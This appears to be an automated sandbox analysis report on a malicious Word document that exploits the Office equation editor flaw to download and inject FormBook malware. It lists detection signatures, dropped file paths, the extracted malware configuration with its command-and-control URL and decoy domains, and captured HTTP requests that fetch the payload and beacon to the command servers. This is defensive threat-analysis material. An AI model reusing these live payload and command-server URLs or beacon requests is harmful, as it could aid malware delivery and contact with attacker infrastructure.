Analysis Report INQUIRY-PO3010773..EPR55804.doc

Overview

General Information

Sample Name: INQUIRY-PO3010773..EPR55804.doc
Analysis ID: 432659
MD5: ca66b439a178c115e4a0634da09c27ce
SHA1: 076b862373c50f30b121b8f64b60673434ca9b90
SHA256: 4e0fefa37d9dc5faec3e64cc9129b8004fd349b209228a97101c66b30cde4e10
Tags: doc
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\sirtx[1].exe Avira: detection malicious, Label: HEUR/AGEN.1141549
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Avira: detection malicious, Label: HEUR/AGEN.1141549
Found malware configuration
Source: 00000004.00000002.2094658238.0000000003F49000.00000004.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.studiooculto.com/n8ud/"], "decoy": ["certification-plus.com", "linkedoutbook.com", "bethesdalashes.com", "blazingthenet.com", "lohmanphotogallery.com", "solidlinks.info", "alvingohproperty.com", "hometheaterplanning.com", "beoke.com", "ddthi.com", "floridamotorcyclemasons.net", "stither.com", "majorhumanities.com", "palpaynaira.com", "webossgoo.com", "thebrck.com", "crackhook.com", "363dahlia.com", "mybusiness-plus.com", "seatachawaiianbarbecue.com", "uoekiqliea.net", "zyslz.com", "frightvision.online", "gordonenergysolutions.com", "matthewcoyte.com", "hackingnews.info", "royallondonhair.com", "thegioirc.com", "856380588.xyz", "popitara.com", "luisxe.info", "cbdthc.domains", "869bernardilane.com", "airikit.com", "centraldomusmatera.com", "onlinecreditnow.com", "ilamaths.com", "janeharriganhorn.com", "fullapologies.com", "xpfisioterapia.com", "spring-boot.com", "wrighttransportllc.com", "nemahealthcare.com", "taxikuka.com", "promoterss.com", "kirklandtroll.com", "aviationbrothers.com", "fylldagenebergen.com", "vycocover.com", "cookingsecret.net", "intentguild.com", "athenalim.com", "nothingoingapart.info", "neurosene.com", "doctorelizabethwise.com", "lalamasks.cloud", "livemaharashtra24.com", "catrinettealyssandre.com", "wovkreations.com", "piapiadine.com", "uebfaushb.com", "curlupanddyesc.com", "seniorbenefits.support", "didyouswipe.com"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\sirtx[1].exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Roaming\sirt3512.exe ReversingLabs: Detection: 34%
Multi AV Scanner detection for submitted file
Source: INQUIRY-PO3010773..EPR55804.doc ReversingLabs: Detection: 23%
Yara detected FormBook
Source: Yara match File source: 00000007.00000002.2353252437.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2353301076.0000000000290000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2132134881.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2132063520.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2094658238.0000000003F49000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.2092914206.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2132009638.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2353128733.00000000000E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 5.2.sirt3512.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.sirt3512.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.sirt3512.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.sirt3512.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.sirt3512.exe.3f494f0.5.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\sirtx[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 7.2.control.exe.b0000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 5.0.sirt3512.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.0.control.exe.b0000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 5.2.sirt3512.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.2.sirt3512.exe.1b0000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 5.2.sirt3512.exe.857418.2.unpack Avira: Label: TR/Dropper.Gen

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\sirt3512.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\sirt3512.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Unpacked PE file: 4.2.sirt3512.exe.1220000.3.unpack
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: control.pdb source: sirt3512.exe, 00000005.00000002.2132218595.0000000000839000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdb source: sirt3512.exe, control.exe

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4x nop then imul eax, dword ptr [ebp-20h], F66207D0h 4_2_001BD7F0
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4x nop then pop ebx 5_2_00407B0A
Source: C:\Windows\SysWOW64\control.exe Code function: 4x nop then pop ebx 7_2_000E7B0A
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: carbinz.ga
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 185.239.243.112:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 185.239.243.112:80

Networking:

barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.studiooculto.com/n8ud/
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 10 Jun 2021 14:31:06 GMTContent-Type: application/x-msdownloadContent-Length: 1116672Last-Modified: Thu, 10 Jun 2021 03:42:12 GMTConnection: keep-aliveETag: "60c18a14-110a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 49 47 c1 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 ea 0d 00 00 1e 03 00 00 00 00 00 9e 09 0e 00 00 20 00 00 00 20 0e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 11 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 09 0e 00 4f 00 00 00 00 20 0e 00 38 1a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 11 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 e9 0d 00 00 20 00 00 00 ea 0d 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 38 1a 03 00 00 20 0e 00 00 1c 03 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 11 00 00 02 00 00 00 08 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 09 0e 00 00 00 00 00 48 00 00 00 02 00 05 00 90 b6 0b 00 bc 52 02 00 03 00 00 00 42 00 00 06 98 8c 03 00 f8 29 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c1 de 6a 95 3f 80 75 77 88 fe 6c 79 59 68 65 f7 d9 57 90 8c d7 07 10 25 fb 07 2c 7c 9f cd e4 2e 70 38 95 1d a2 67 93 95 34 04 93 de c6 26 8e 77 a3 f4 9d 3c 4f 44 c7 b9 36 38 be 06 c8 68 20 36 52 50 af 50 73 36 e2 d6 82 a4 b1 dd 0a 08 a9 08 7a a1 b6 ef a8 6d 19 57 30 4c be 10 07 03 9e 59 62 67 ed 6b 88 c9 ac d6 50 98 12 41 2c be e5 ce 47 60 f5 e9 5a f1 94 25 54 93 a1 8c 6a d2 d1 21 66 a2 54 dc 4f 0d 06 f0 12 32 be 16 9d 8c d5 ce 62 a8 31 72 d1 48 83 2d 89 1a 87 fe 22 6e 23 04 83 6e 30 de e7 fd 01 a5 f4 75 e7 83 7a 6d 22 21 b7 41 e2 01 d4 30 56 f7 db 4e f2 0d 01 7a de eb 29 d2 68 c4 4f 1f ab 36 2e 80 9b 20 c8 77 c4 11 71 c7 d0 4a 64 a8 93 d5 06 3c 54 6b 61 e5 92 df 1b c7 ab a0 16 ca 08 b0 71 5c 43 0e 36 08 82 d3 ca 06 ec 66 a4 37 ce 6e ca 29 6d e6 70 b5 fc 32 f2 0e bd 3f de 76 b9 7a 3b 38 68 dc 5b a8 64 7d 82 36 cd f5 5e 04 97 7a 8b 16 c2 f8 f5 cc 0a 3c 6c ca 90 49 de f4 38 9c 48 79 29 b1 ea 71 d5 9a cf a2 84 f1 e9 48 03 dd 4e 31 49 50 38 39 7e 4c 7d
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /n8ud/?OR-pi=zdrThtgHqt3&4hxpznj0=uGv12cOEt0iW8+7qxEh+/IYx8LbagoRp4MqXc8oHizx2MfFB1iSeUlEQ8HXQ5dQCk04DkA== HTTP/1.1Host: www.869bernardilane.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ud/?4hxpznj0=4BFY1+RZf6BraFjHhRNVJ13lzvhcvhDXEvQAp0BhQKRdCzLT+26MMJqFH8vg/bSXx7Qe0w==&OR-pi=zdrThtgHqt3 HTTP/1.1Host: www.363dahlia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 64.98.145.30 64.98.145.30
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
Source: Joe Sandbox View ASN Name: TUCOWS-3CA TUCOWS-3CA
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /modex/sirtx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: carbinz.gaConnection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{24B24510-30CA-4646-ACFF-79FC9E14ADCB}.tmp Jump to behavior
Source: global traffic HTTP traffic detected: GET /modex/sirtx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: carbinz.gaConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /n8ud/?OR-pi=zdrThtgHqt3&4hxpznj0=uGv12cOEt0iW8+7qxEh+/IYx8LbagoRp4MqXc8oHizx2MfFB1iSeUlEQ8HXQ5dQCk04DkA== HTTP/1.1Host: www.869bernardilane.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ud/?4hxpznj0=4BFY1+RZf6BraFjHhRNVJ13lzvhcvhDXEvQAp0BhQKRdCzLT+26MMJqFH8vg/bSXx7Qe0w==&OR-pi=zdrThtgHqt3 HTTP/1.1Host: www.363dahlia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000006.00000000.2102624718.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: carbinz.ga
Source: explorer.exe, 00000006.00000000.2117147889.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://%s.com
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2117147889.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2102624718.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.2102624718.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
Source: explorer.exe, 00000006.00000000.2102797135.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.2102797135.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://sads.myspace.com/
Source: explorer.exe, 00000006.00000000.2097589761.0000000001C70000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: sirt3512.exe, 00000004.00000002.2094353245.0000000002741000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.aol.co.uk/
